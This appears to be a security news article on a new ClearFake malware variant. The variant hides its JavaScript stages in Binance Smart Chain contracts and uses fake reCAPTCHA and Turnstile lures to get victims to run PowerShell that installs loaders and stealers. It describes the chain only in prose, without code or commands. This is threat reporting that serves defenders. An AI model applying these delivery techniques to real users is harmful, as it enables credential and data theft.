Ddos 
A new variant of the ClearFake malware is exploiting Web3 capabilities to enhance its malicious operations, according to a report by the Sekoia Threat Detection & Research (TDR) team. ClearFake, known for delivering malware through drive-by downloads, has evolved its tactics to include sophisticated interactions with the Binance Smart Chain.
ClearFake first emerged in July 2023, using injected code to display fake web browser download pages. By May 2024, it adopted the ClickFix tactic, deceiving users into executing malicious PowerShell code via fake error messages. The latest variant, observed since December 2024, introduces new lures such as fake reCAPTCHA or Cloudflare Turnstile verifications to trick users into executing malicious code.
This new variant incorporates additional interactions with the Binance Smart Chain. These interactions involve loading JavaScript code and resources that fingerprint the victim’s system, as well as downloading, decrypting, and displaying the ClickFix lure. “Although this new ClearFake variant continues to rely on the EtherHiding technique and the ClickFix tactic, it has introduced additional interactions with the Binance Smart Chain,” the report states.
The ClearFake framework injects JavaScript code into compromised websites, often WordPress sites. This initial script loads legitimate external dependencies and uses web3 objects to interact with the Binance Smart Chain. It retrieves and executes next-stage JavaScript codes from the Binance Smart Chain contract.
ClearFake uses the web3 library to interact with the Binance Smart Chain API. The script instantiates an object that is an Etherium Contract for a specific wallet with an Application Binary Interface (ABI). The ABI defines functions to retrieve JavaScript codes and wallet addresses from the Binance Smart Chain.
The second stage code verifies a cookie and uses functions defined in the orchid ABI to load and execute obfuscated code from smart contracts. The teaCeremony function is used to deobfuscate and execute the loaded code.
The malicious JavaScript codes are stored in the transactions of a specific wallet, and functions from the orchid ABI are used to access them. These functions include tokyoSkytree, ginzaLuxury, shibuyaCrossing, akihabaraLights, and asakusaTemple.
The reassembled JavaScript code performs several actions, including fingerprinting the victim, obtaining the external URL hosting the encrypted HTML code, downloading data from the URL, and downloading the AES key from the contract. The code then decrypts the HTML code using the AES-GCM algorithm and embeds the cleartext data in a created iframe.
ClearFake uses ClickFix lures, alternating between HTML pages that display either a fake Cloudflare Turnstile or a fake reCAPTCHA. These lures are designed to trick users into executing malicious PowerShell commands.
The PowerShell commands distributed by ClearFake execute Mshta.exe with a script hosted on a remote server, often masquerading as a video file. This script is the initial stage of Emmenhtal Loader, which drops Lumma Stealer. In some cases, ClearFake also spread Vidar Stealer.
The ClearFake variant demonstrates a persistent and evolving threat, utilizing multiple pieces of data stored in the Binance Smart Chain. This “EtherHiding” technique makes the malicious content difficult to remove and allows attackers to use a legitimate database to store malicious content. The threat remains widespread, affecting many users globally.
Donate